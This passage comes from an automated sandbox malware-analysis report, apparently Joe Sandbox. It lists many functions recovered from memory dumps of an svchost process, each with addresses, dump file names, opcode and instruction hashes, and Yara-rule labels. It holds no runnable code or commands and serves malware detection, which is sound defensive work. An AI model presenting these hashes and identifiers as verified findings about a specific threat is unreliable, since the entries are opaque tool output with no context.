Opcode Fuzzy Hash: 745f037aff6ebadae623e837e0d4409ad28b61ddd2ebbdf6a9e82d2322f6f59c
Instruction Fuzzy Hash: 9131A275A04A05DFCB14DF1CC484DAEB7B6FF84308B1549A9E805DB390E771EA51CB90

Function 03B33616 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d408c86f717bd92051fda8da70666b9df373e43a06e44ffb5fbc49e262ee9f66
Instruction ID: 1a10047c47727b7876f8c6cdbbb7a146dfb1e1e4b7e9041e43808a0151d1aee7
Opcode Fuzzy Hash: d408c86f717bd92051fda8da70666b9df373e43a06e44ffb5fbc49e262ee9f66
Instruction Fuzzy Hash: 5621C5392497609FC761EF15C944B2BBBE4FB82A18F0904B9E8498F651C7B0E844DB91

Function 03C00591 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a0e2459afeccec150c139c27787c362f79bdc283bd984a043668b9dc69bde01
Instruction ID: 963b39f77edacdd5b60ef9171b781a39f9ed76768092c544d95fc60aab0cc1e5
Opcode Fuzzy Hash: 1a0e2459afeccec150c139c27787c362f79bdc283bd984a043668b9dc69bde01
Instruction Fuzzy Hash: CD2105326146558FD728CE29C880BBAB3A6EFD4300F5A4478ED05CB2C5D730F945CB50

Function 0040E9D7 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 085b2fd46f7d93daafe8650dda4f0747615f920dbd53016804befd0b88addc99
Instruction ID: bfdd9678b32a6337758f681ac3970ceb00dcd911b0e7fa776b5a75971f7ec3c9
Opcode Fuzzy Hash: 085b2fd46f7d93daafe8650dda4f0747615f920dbd53016804befd0b88addc99
Instruction Fuzzy Hash: 7C21E431A002459BC714DFBAC881AABBBF2BF8D300F45C86ED555AB242C635A806CB00

Function 03B5F32A Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
Instruction ID: 1a2579485e960d9a37f8646c3d659b699dd3517c677d08cfcbab654024eefdb4
Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
Instruction Fuzzy Hash: CE218E72200300DFD719DF15C445B6AFBE9EF95369F1581BDE90A8B2A0EB70E901CA94

Function 03BB06F1 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f0810d9300d4aa69625cb6197e3e45abc343d72fbb0e8539cf073d1aa9c0619
Instruction ID: e5b4aa3b3884d6f7053d0ce353712a355f590b4509fb2f6f1a4968aa752aff26
Opcode Fuzzy Hash: 3f0810d9300d4aa69625cb6197e3e45abc343d72fbb0e8539cf073d1aa9c0619
Instruction Fuzzy Hash: 27217E75A106299BCB20EF59C881ABEF7F8FF48744F5400A9E541EB250DB78AD51CBA0

Function 03BB019F Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f190feb4a19f6c1e9c2c0019c173d52c541dc13054f098f25a72c31eb7039b1c
Instruction ID: 9c3eb5522dfd8774cfc2200c1525209bd20a316589079e0e942a968194211846
Opcode Fuzzy Hash: f190feb4a19f6c1e9c2c0019c173d52c541dc13054f098f25a72c31eb7039b1c
Instruction Fuzzy Hash: 03218D75600644AFC715EB68C940B6AB7B8FF48744F1800A9F944DB691D774ED50CB58

Function 0040E9E3 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c503850b818d2fe8919aae5879c55e69022976165ee3ddbf289a9aa6bb5ea7e4
Instruction ID: 2839ce80ebb8e5d7e268c67f79f619ce95aaadf004f7b853d0657c46509423fe
Opcode Fuzzy Hash: c503850b818d2fe8919aae5879c55e69022976165ee3ddbf289a9aa6bb5ea7e4
Instruction Fuzzy Hash: 7521F731A003459BC714DFBAC881BAFB7F2BF8D300F458C6ED556AB242C634A8028B54

Function 03BB0283 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b31894fc8823b24e0b7b51b0c94310e3c8b1b2b567bc856570d9644a02780316
Instruction ID: 57b86080f7781d05c00404422fc0a1f1de8bb59ebdbbabc5f400f76adb095ac4
Opcode Fuzzy Hash: b31894fc8823b24e0b7b51b0c94310e3c8b1b2b567bc856570d9644a02780316
Instruction Fuzzy Hash: 052192729043459BD711EB59C848BBBBBECFF85248F0C44B6BC848B251DB74DA48C6A2

Function 03BD71F9 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d91e94850dda6fb5c75dc91370fc913963837b184670c9b0568a679a9393048d
Instruction ID: 2161ec6a004f16dd56eedfbe9a049871ec3aa490cf08d67324b240410bfb50af
Opcode Fuzzy Hash: d91e94850dda6fb5c75dc91370fc913963837b184670c9b0568a679a9393048d
Instruction Fuzzy Hash: 25210635E047908BC320DE258846BABB7E9EBC2318F1449BDF8A6C7140EF70A8458791

Function 03BAD0C0 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
Instruction ID: 2afc854acc7d0bba07a89699027e6be4140b9c7adb8ec69bccca8141b9026425
Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
Instruction Fuzzy Hash: AB21B072748B04ABD321DE1C8C51B5ABBA4EB89728F04057EF9499B7A0D730D90187A9

Function 03C001AA Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed879f627a0ee1e4f79af8f8b9f6d05810d27bfe03ec72ea64d15c8efc9905a7
Instruction ID: 35e6f53c396f2a62bfb9a7a66d9933f79ba612d4584635c71c4d63a96a903aea
Opcode Fuzzy Hash: ed879f627a0ee1e4f79af8f8b9f6d05810d27bfe03ec72ea64d15c8efc9905a7
Instruction Fuzzy Hash: CC21B4612042A44FE745CB5A98B45BABFE5EFC6229B1A82E6D984CF343C534D907C7A0

Function 03B6A30B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9edc4c431027b04b0fbd3fd6d5ec73ed9fc513061208f7bcb851c2ae24e0dd
Instruction ID: 99ddfa2033fcd24c664293a7897f3759e4c9adad9a2c5ead61364ece526b1e22
Opcode Fuzzy Hash: cd9edc4c431027b04b0fbd3fd6d5ec73ed9fc513061208f7bcb851c2ae24e0dd
Instruction Fuzzy Hash: A421AF79200B109FCB25DF29C800B46B7F5EF48708F1884A8A509CB752E335E942CF98

Function 03BC80A8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
Instruction ID: 9c23221e87678c2924054744830fd01891ce097e8e1603293ab713543fbf1b15
Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
Instruction Fuzzy Hash: AE216A76A00249AFDF22DF98CC40BAEBBFAEF88314F2444A9F944A7250D734D9509B50

Function 03B2B765 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f4752a3872567807461252344ef0e3e71d845cb07aa18f29e71baa520657e45a
Instruction ID: b95b7a49d3429fb6f007d28c035ea6bbe3acb4935738e3c4d2ec21d0a36c8cff
Opcode Fuzzy Hash: f4752a3872567807461252344ef0e3e71d845cb07aa18f29e71baa520657e45a
Instruction Fuzzy Hash: B8214836110710DFC721EF58C941F19B7F5FF18708F184AB8E01A9AAA1DB74A810DB54

Function 03BFEE26 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 384609bcf136e2bd98c2d5caadb442e80ac196189c02e89d698c096fc7e1ff88
Instruction ID: 19e18168a75bf0fca6a5fea454b0be7e49dd96fcd05c60ae285a5b5173a525ec
Opcode Fuzzy Hash: 384609bcf136e2bd98c2d5caadb442e80ac196189c02e89d698c096fc7e1ff88
Instruction Fuzzy Hash: 0021E433A204159F9B18CF3DD800566F7E6EFDC31436A427AD512DB268D770FD158A84

Function 03B60124 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction ID: 9b6fe99d3072324c1f348714b7fca802dfce5c5632896ae0140e113fbc6307f6
Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction Fuzzy Hash: 7711D076601704AFD722EA46D840F9ABBB8EB80758F1400B9F6048F181D679ED44CB50

Function 03B38770 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45274712141fa165e1b29264f220b181e71b577e1f46d85447ddacab82c2ae3c
Instruction ID: c9f2241730fb322d11dd2d67c48940ead4beb43502691b4f9bb5202e2bc342a6
Opcode Fuzzy Hash: 45274712141fa165e1b29264f220b181e71b577e1f46d85447ddacab82c2ae3c
Instruction Fuzzy Hash: 1C119036600630DBCB11CF59C480A5AB7EAEF4B758B1840B9FD08DF205D6B2E905C792

Function 03B33720 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e1d1238d72bb9fc59e45a11414fadbdb89b073ca1e4f7ab481ce05bfe0817f9
Instruction ID: 5a7e3a612c45ef920cbdcc56be52f196cac74f01a7fedbd02c890605dca80bc5
Opcode Fuzzy Hash: 5e1d1238d72bb9fc59e45a11414fadbdb89b073ca1e4f7ab481ce05bfe0817f9
Instruction Fuzzy Hash: 7521C578A00219CBE725DF6DD448BEEB7E4EB8931CF2D80B8D816572D0CBB89945CB51

Function 03B380E9 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 885ebee951190c6029aed08c76eadb4c764a36e393cd4b0bbc2b4baec47469da
Instruction ID: 4fe859e21fc6b00323c144786245af1624408f276d374915908791c946e5d492
Opcode Fuzzy Hash: 885ebee951190c6029aed08c76eadb4c764a36e393cd4b0bbc2b4baec47469da
Instruction Fuzzy Hash: 29215B75A40619DFCB14CF98C581BAEBBB5FB89318F2441ADE105AB310CB71AD0ACBD1

Function 03B6674D Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6290f1a6efae85b9ca11079ff91fd6dbc4f77b60ba31ad1f37149d37d8c2e56
Instruction ID: e1ed314db2fc757d1c96f3f3fa8d285ebd144ac835136709d670e9edcc8392e2
Opcode Fuzzy Hash: b6290f1a6efae85b9ca11079ff91fd6dbc4f77b60ba31ad1f37149d37d8c2e56
Instruction Fuzzy Hash: EF215C75610B00EFC720DF69C881B76B3E8FF44258F4488BDE8AAC7651DA74AD50CBA4

Function 03B29240 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6093077566e78f3b3f36d97244c615fed3fb38930cfa4e5f677f6130bfc38ab6
Instruction ID: 5e10702c94bbf65573505a8d752d049bb27e1c04d251ffb769bfd9329367de20
Opcode Fuzzy Hash: 6093077566e78f3b3f36d97244c615fed3fb38930cfa4e5f677f6130bfc38ab6
Instruction Fuzzy Hash: 0611E27E030681EAD735FF66D901B627BA8EB64A84F144065E804DB258E739DD11CB64

Function 03B666B0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d555bac27eee2daa184395da213e102452b60fa49b3a8015297c749cf033dec
Instruction ID: 9325f53586e97a51a16a9d3839f870a7a996125f71fa77c042a21778f7471cab
Opcode Fuzzy Hash: 7d555bac27eee2daa184395da213e102452b60fa49b3a8015297c749cf033dec
Instruction Fuzzy Hash: B111C176A01244DFCB24DF59D580B6ABBE8EF94614F0940F9ED05DB312D678DD00DBA4

Function 03BFFF09 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 477881d6a1942132d49e4def7bb8c1f9099389e8e982f957897e846431efcc44
Instruction ID: 46e763ac226b385e4e1e1b18a8c208f25ec49eb7bac4c5ac961ccf86c5952a56
Opcode Fuzzy Hash: 477881d6a1942132d49e4def7bb8c1f9099389e8e982f957897e846431efcc44
Instruction Fuzzy Hash: D62153B1A102059FD754DF2AE884B42BBE5FB5D314B8585BAE90CCF24AE770D844CF90

Function 03B527ED Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68f7234e210a04c9156a5b18fe4b655ae21b468bfb505b72bb5d63bfe330ac1b
Instruction ID: 0e20dd873a9ec78ea89838729c20bced564e524bc1e7a607c1efb7dec05299f5
Opcode Fuzzy Hash: 68f7234e210a04c9156a5b18fe4b655ae21b468bfb505b72bb5d63bfe330ac1b
Instruction Fuzzy Hash: FC01C475606644ABE716E2A99C84F67AB9CEF4135CF0D04F6F8048F651DA54DC00C2A1

Function 03B5B052 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd9d9139a1ea33b821a033a1eb8bb66e1b96524a8ae4bf7d304e1fd4caf1ead
Instruction ID: 62d722fe3b130f2bc257672e0c1179f81377708ab48933ca56a2ceeabe4ba53a
Opcode Fuzzy Hash: 2cd9d9139a1ea33b821a033a1eb8bb66e1b96524a8ae4bf7d304e1fd4caf1ead
Instruction Fuzzy Hash: C6019676B04744ABD711EB699C81F6BB7E8DF84618F0804B9FA15D7241EA70E9018661

Function 03B34690 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3fd5a44cd3903fcf9c8bbbd50d501ad5080ed0d09e13e679e36d3d3bc149b11
Instruction ID: ba390ed9a6ce905c8bb5e42667824de0e27172a340fc7a644758f08b93d5b6eb
Opcode Fuzzy Hash: e3fd5a44cd3903fcf9c8bbbd50d501ad5080ed0d09e13e679e36d3d3bc149b11
Instruction Fuzzy Hash: DD11A03A240764EFCB25CF5AD940F56BBA8EB87768F0441B5F8548B250C370E800CF60

Function 03BED6F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
Instruction ID: 73fb30f9bc80b3b0eb8e9f68d507bae126b1f7df8fd82bb6e57ad9c7bb915765
Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
Instruction Fuzzy Hash: 54018275700209AFDB14DBAAD944CAFBBBCEF84A48F0500BDA91587100E774EE01E760

Function 03B66620 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c886b9b6a4f1f0b9e291413f34c1f3e79168edd3eb375a99b2ea7c68692b2d0
Instruction ID: 739b512dd10dfc5d8446faccd388e75464b5684243403276b96cbba398d0bf39
Opcode Fuzzy Hash: 7c886b9b6a4f1f0b9e291413f34c1f3e79168edd3eb375a99b2ea7c68692b2d0
Instruction Fuzzy Hash: A3110876A00715ABCB22EF59D9C0B9EF7B8EF84744F5400B5D905AB202D734AD01CBA0

Function 03B27330 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46b2d6dd3aaae90d25d47473c167ca31c9795ccd7f872225c463cc90b4b92ace
Instruction ID: ebfd45f23f8ee639f2674174e9a1fc258267f3e900fb5de7f9f61a11d0c8411f
Opcode Fuzzy Hash: 46b2d6dd3aaae90d25d47473c167ca31c9795ccd7f872225c463cc90b4b92ace
Instruction Fuzzy Hash: 9311E0716007249FD721CF65C846F6BBBE8EB44308F0545B9E989CB201DB31ED02CBA8

Function 03B5F2D0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19459f1454e93a376d4cbf36e45c8c6f355e97692f187e594301abbf1204501e
Instruction ID: 170943caeb24cc16fdf8ce36626f7190978d79d1374cea3071bcc628b4f955ef
Opcode Fuzzy Hash: 19459f1454e93a376d4cbf36e45c8c6f355e97692f187e594301abbf1204501e
Instruction Fuzzy Hash: 0C11AC75600A48EBD720EF69C884BAAB7A8EB44708F1804BAE905EB241DA79DA01C750

Function 03BC72A0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
Instruction ID: 733a3ef769221ef33befe135ad597068f9ef641bd9b089437939371859cd0a57
Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
Instruction Fuzzy Hash: 7E01D27A240609BFE721EF16CC85E62F76DFF84398F044979F1544A560CB21ACA0CAA4

Function 03B2A250 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction ID: cc80e92ddc70f5685ae45b66987bbb1213629d09019849bdcf8d220b41b0b070
Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction Fuzzy Hash: 7701D671905B259BCB30CF15D840A36BFA9EF457647058BBDFC998B680DB31D420CB60

Function 03B36259 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de85cf8fd2b261bbe861bad7ce14f734ec0cfe5bf831551e302970fd5cbb08d2
Instruction ID: 18bbd1f2fbc842403c05418a9eef729468655119b92fbbbb7f0ca95185f9f63c
Opcode Fuzzy Hash: de85cf8fd2b261bbe861bad7ce14f734ec0cfe5bf831551e302970fd5cbb08d2
Instruction Fuzzy Hash: 56115E74941328ABDF25EB64CD41FE9B3B8EF04718F5445E4A328AA1E0DB709E91CF84

Function 03BAE1D0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef4d34c400a3d973d599d275389c5f24b0613b04732a8654cc52d0652a0bb808
Instruction ID: da5c8162c75e41adb5a60275e28133abd560e7ab77540359af343eb932f06483
Opcode Fuzzy Hash: ef4d34c400a3d973d599d275389c5f24b0613b04732a8654cc52d0652a0bb808
Instruction Fuzzy Hash: B1113C36641740EFCB15EF19C990F56B7B8FF44B58F1400B5E9059B661D735ED01CAA0

Function 03B3208A Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction ID: 90271feda9934f0936445b9ef716a86859d90b448876818cb88c71d31ed0cb89
Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction Fuzzy Hash: 410124322002208BEF14EA29D880BA6B76AFFC5708F1949F9ED05CF245EA71C885C790

Function 03BB6050 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3da5479356c9e7599acd10e9262c5728486c616d66a6017c42adf2633fb596eb
Instruction ID: fe3c04ba3abad8b0d905d4e327e98e111517a0a5cb29b6cec447af0b89ed7dd2
Opcode Fuzzy Hash: 3da5479356c9e7599acd10e9262c5728486c616d66a6017c42adf2633fb596eb
Instruction Fuzzy Hash: CE11297790011DABCB11DB95CC84EEFBB7CEF48258F0441A6E906E7211EA34EA14CBE0

Function 03B720F0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4573388f452da59469fe26d351d77ce79445b5a14587b56fd5dd8eac0394952
Instruction ID: 22f2d318516d5ff613068ca1a286e88e8a55c204ae36015076e7b41e1e23c38c
Opcode Fuzzy Hash: d4573388f452da59469fe26d351d77ce79445b5a14587b56fd5dd8eac0394952
Instruction Fuzzy Hash: F9116935A0020CEBDF05EFA4C850FAE7BB9FB44348F0040A9E9159B290DA35EE11CB90

Function 03B2C020 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

